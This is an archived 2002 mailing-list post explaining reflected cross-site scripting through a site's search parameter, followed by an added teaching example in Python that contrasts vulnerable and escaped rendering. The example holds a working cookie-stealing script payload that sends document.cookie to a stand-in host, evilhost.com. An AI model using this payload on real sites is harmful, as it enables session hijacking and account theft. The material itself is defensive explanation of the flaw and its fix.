> Maybe I have completely missed the boat on this one, and if so,
> please explain how I could attack someone ELSE with these...

A friend just explained it to me. I guess I kinda did miss the boat... I will explain it here so that others who were as confused as I was can learn from this as well. If my reasoning is flawed, I would like to hear about it:

The victim has an account on a site which uses cookies for authentication. An attacker sends them a link (in email, or otherwise) to that site with JavaScript encoded in the GET of the URL. This GET string activates the search functionality of the site, thus causing the JavaScript to be run, which steals the victim's cookie and sends it back to evilhost.com in another GET. Of course other scenarios exist, but this is just one example.

Side note: On the subject of ethics... I am all for full-disclosure policies. However, in many cases, disclosing web application vulnerabilities is senseless if the application is only served up by a single entity. The whole point of disclosure is so that those running the buggy applications can do the footwork and download the applicable patches. In the case of custom web applications that run on one small set of servers, I don't see how full disclosure PRIOR to a fix is needed. If a web application is buggy, and it is only running on one site, a fix benefits ALL users immediately. Disclosure prior to this only opens the site and its users up for attack. Of course if the people running the site refuse to fix it, that is another matter...

sincerely,
tim
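The scenario tim lays out above (a search page that echoes the GET parameter back into the HTML, so script in the link runs in the victim's browser and ships document.cookie to evilhost.com) is what is now called reflected cross-site scripting. The following is an added example written for this archive page, not code posted by tim or taken from any site discussed in the thread. The hostname victim.example, the parameter name q, the page layout and the exact payload are assumptions chosen for illustration; the only thing taken from the post is the shape of the attack. It shows the attacker's link, the server pulling the search term out of the URL, the vulnerable rendering beside the escaped rendering, and a simple check that tells the two apart.

```python
"""Reflected XSS through a search parameter: vulnerable vs. escaped rendering.

Added example, not from the original list post.  Hostnames victim.example
and evilhost.com, the parameter name ``q`` and the page markup are
assumptions for illustration only.
"""
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed attacker payload.  In the victim's browser it loads an image
# from evilhost.com with the session cookie in the query string: the
# "another GET" described in the post.
PAYLOAD = '<script>new Image().src="http://evilhost.com/?c="+document.cookie</script>'


def attacker_link(base="http://victim.example/search", param="q", payload=PAYLOAD):
    """Build the link the attacker mails to the victim.

    The script is URL-encoded so it survives as a single GET parameter.
    """
    return f"{base}?{param}={quote(payload, safe='')}"


def query_from_url(url, param="q"):
    """Server side: recover the search term from the request URL.

    parse_qs undoes the percent-encoding, so the server sees the raw script.
    """
    values = parse_qs(urlsplit(url).query).get(param, [""])
    return values[0]


def render_vulnerable(query):
    """Echo the search term straight into the page.

    This is the bug: markup in ``query`` becomes markup in the response.
    """
    return (
        "<html><body>"
        f"<h1>Results for: {query}</h1>"
        "<p>No results.</p>"
        "</body></html>"
    )


def render_escaped(query):
    """Escape the search term for the HTML text context before echoing it.

    ``<`` becomes ``&lt;`` etc., so the browser shows the script as text
    instead of executing it.
    """
    return (
        "<html><body>"
        f"<h1>Results for: {html.escape(query, quote=True)}</h1>"
        "<p>No results.</p>"
        "</body></html>"
    )


def injected_script_present(page):
    """Check: does the rendered page contain a live <script> element?

    An escaped page contains ``&lt;script`` instead, which does not match.
    """
    return "<script" in page.lower()


if __name__ == "__main__":
    link = attacker_link()
    q = query_from_url(link)
    print("link sent to victim:", link)
    print("vulnerable page executes script:", injected_script_present(render_vulnerable(q)))
    print("escaped page executes script:   ", injected_script_present(render_escaped(q)))
```

Escaping at the point where untrusted input is written into HTML is the fix for the search page itself; the check above is deliberately crude (it only looks for a script tag) and is there to show the difference between the two renderings, not to serve as a filter. Marking the session cookie HttpOnly keeps it out of document.cookie and so blunts this particular exfiltration, but injected script can still drive the victim's session from inside the page, so it is a second layer rather than a substitute for output encoding.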
This archive was generated by hypermail 2b30 : Tue Jan 29 2002 - 15:08:09 PST